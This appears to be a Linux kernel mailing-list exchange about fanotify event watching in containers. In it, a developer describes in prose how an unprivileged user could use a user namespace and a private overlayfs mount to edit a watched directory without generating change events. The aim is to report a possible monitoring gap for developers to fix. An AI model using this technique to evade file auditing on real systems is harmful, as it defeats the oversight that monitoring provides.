> > > OK, so this feature would effectively allow sb-wide watching of events that > > > are generated from within the container (or its descendants). That sounds > > > useful. Just one question: If there's some part of a filesystem, that is > > > accesible by multiple containers (and thus multiple namespaces), or if > > > there's some change done to the filesystem say by container management SW, > > > then event for this change won't be visible inside the container (despite > > > that the fs change itself will be visible). > > > > That is correct. > > FYI, a privileged user can already mount an overlayfs in order to indirectly > > open and write to a file. > > > > Because overlayfs opens the underlying file FMODE_NONOTIFY this will > > hide OPEN/ACCESS/MODIFY/CLOSE events also for inode/sb marks. > > Since 459c7c565ac3 ("ovl: unprivieged mounts"), so can unprivileged users. > > > > I wonder if that is a problem that we need to fix... > > I assume you are speaking of the filesystem that is absorbing the changes? > AFAIU usually you are not supposed to access that filesystem alone but > always access it only through overlayfs and in that case you won't see the > problem? > Yes I am talking about the "backend" store for overlayfs. Normally, that would be a subtree where changes are not expected except through overlayfs and indeed it is documented that: "If the underlying filesystem is changed, the behavior of the overlay is undefined, though it will not result in a crash or deadlock." Not reporting events falls well under "undefined". But that is not the problem. The problem is that if user A is watching a directory D for changes, then an adversary user B which has read/write access to D can: - Clone a userns wherein user B id is 0 - Mount a private overlayfs instance using D as upperdir - Open file in D indirectly via private overlayfs and edit it So it does not require any special privileges to circumvent generating events. Unless I am missing something. Thanks, Amir.